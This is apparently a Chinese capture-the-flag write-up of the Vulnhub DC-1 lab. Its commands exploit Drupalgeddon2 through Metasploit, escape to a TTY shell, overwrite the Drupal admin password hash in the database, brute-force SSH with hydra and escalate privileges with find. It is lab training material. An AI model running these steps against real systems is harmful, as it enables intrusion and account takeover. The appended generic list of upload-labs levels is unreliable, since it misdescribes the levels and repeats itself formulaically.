Vulnhub靶场----1、DC-1


一、环境搭建

靶场下载地址:https://download.vulnhub.com/dc/DC-1.zip
Kali地址:192.168.144.148
DC-1靶机地址:192.168.144.149


二、渗透流程

端口扫描:nmap -A -T4 192.168.144.149
开放端口22、80、111

在这里插入图片描述

访问web页面:http://192.168.144.148:80
站点为Drupal

在这里插入图片描述

利用metasploit搜索drupal相关exploit
命令:search drupal

在这里插入图片描述

use 1use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 192.168.144.148
runexploit
得到meterpreter

在这里插入图片描述
在这里插入图片描述

ls 得到flag1.txt

在这里插入图片描述

交互式获取shell:
shell
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
在这里插入图片描述

flag1.txt提示查看配置文件,drupal的配置文件位置/sites/default/setting.php
cd /sites/default
cat settings.php

在这里插入图片描述

flag2.txt提示有数据库账密
连接数据库:mysql -u dbuser -p
使用数据库:use drupaldb;
获取表:show tables;

在这里插入图片描述

查看表users字段:select * from users;
字段值使用hash加密

在这里插入图片描述

Drupal可以利用password-hash.sh文件来对密码进行加密,生成密文。
查找password-hash.sh文件:find / -name password-hash*
cd /var/www
加密密码test2:scripts/password-hash.sh test2

在这里插入图片描述

数据库中更新密码:update users set pass="$S$D/heNxs7AXrpES/O0QYuv9trlOefIrXmfo7PrdJRxd8mjU1e1e9l" where name="admin";

在这里插入图片描述

使用admin:test2登录,查看flag3.txt

在这里插入图片描述

根据flag3.txt提示进入/etc/passwd得到flag4账户
cat /etc/passwd

在这里插入图片描述

尝试对flag4账户进行暴力破解
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.144.149
获取到密码:orange

在这里插入图片描述

ssh连接flag4账户:ssh flag4@192.168.144.149
提示使用find提权

在这里插入图片描述

find提权:find flag4.txt -exec /bin/bash -p \;

在这里插入图片描述

查看最后一个flag:thefinalflag.txt

在这里插入图片描述


三、思路总结

1、nmap端口扫描访问web页面,
80端口:站点使用drupal CMS
22:SSH
2、metasploit 搜索drupal 相关漏洞利用(Drupal Drupalgeddon2远程代码执行漏洞(CVE-2018-7600))
3、获取到metapreter,逃逸Linux获取TTY shell
4、利用Drupal加密特点对密码加密,进行密码替换
5、ssh密码暴力破解
6、find提权:find . -exec /bin/sh \; -quit

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC1

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
你好!要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:尝试利用文件包含漏洞,读取服务器上的敏感文件。 3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 6. Level 6 - 文件上传漏洞2:绕过上传限制,上传一个恶意文件。 7. Level 7 - 文件包含漏洞2:利用文件包含漏洞,读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞:尝试触发反序列化漏洞,执行恶意代码。 9. Level 9 - 文件上传漏洞3:绕过上传限制,上传一个恶意文件。 10. Level 10 - 文件包含漏洞3:利用文件包含漏洞,读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2:在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 13. Level 13 - 文件上传漏洞4:绕过上传限制,上传一个恶意文件。 14. Level 14 - 文件包含漏洞4:利用文件包含漏洞,读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5:绕过上传限制,上传一个恶意文件。 17. Level 17 - 文件包含漏洞5:利用文件包含漏洞,读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2:尝试触发反序列化漏洞,执行恶意代码。 19. Level 19 - 文件上传漏洞6:绕过上传限制,上传一个恶意文件。 20. Level 20 - 文件包含漏洞6:利用文件包含漏洞,读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3:在上传的 XML 文件中触发外部实体注入。 请注意,在完成每个关卡时,要仔细阅读相关提示和代码,理解漏洞的原理,并尝试不同的方法来解决问题。祝你顺利通关!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值